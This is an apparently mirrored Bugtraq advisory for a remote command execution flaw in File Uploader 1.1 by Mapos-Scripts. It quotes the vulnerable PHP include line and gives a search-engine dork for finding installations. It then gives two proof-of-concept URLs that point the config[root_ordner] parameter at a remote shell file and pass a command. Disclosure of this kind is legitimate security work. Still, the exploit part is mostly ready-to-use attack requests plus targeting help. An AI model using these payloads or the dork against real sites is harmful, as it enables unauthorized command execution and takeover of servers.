File Uploader Version 1.1 Remote Command Execution Vulnerability

From: rizgar@linuxmail.org
To: bugtraq@securityfocus.com
Cc:
Subject: File Uploader Version 1.1 Remote Command Execution Vulnerability
Date:


File Uploader Version 1.1 Remote Command Execution Vulnerability 
-----------------------------------------------------------------------


Script  : File Uploader Version 

Version : 1.1
        
Site    : http://www.mapos-scripts.de

Founder : Rizgar

Contact : rizgar@linuxmail.org and irc.gigachat.net #kurdhack 

Thanks  : Kurdish Hackers Clan(Anti Fashist Group :P), PH(HERO) , ColdHackers(nice boys)

d0rk    : "Copyright (c) 2007 by Mapos-Scripts.de", 
-----------------------------------------------------------------------



include($config["root_ordner"].'includes/function.php');


POC

http://www.site.com/path/index.php?config[root_ordner]=http://shell.txt?&cmd=id
http://www.site.com/path/datei.php?config[root_ordner]=http://shell.txt?&cmd=id

EOF





Copyright © 1995-2018 LinuxRocket.net. All rights reserved.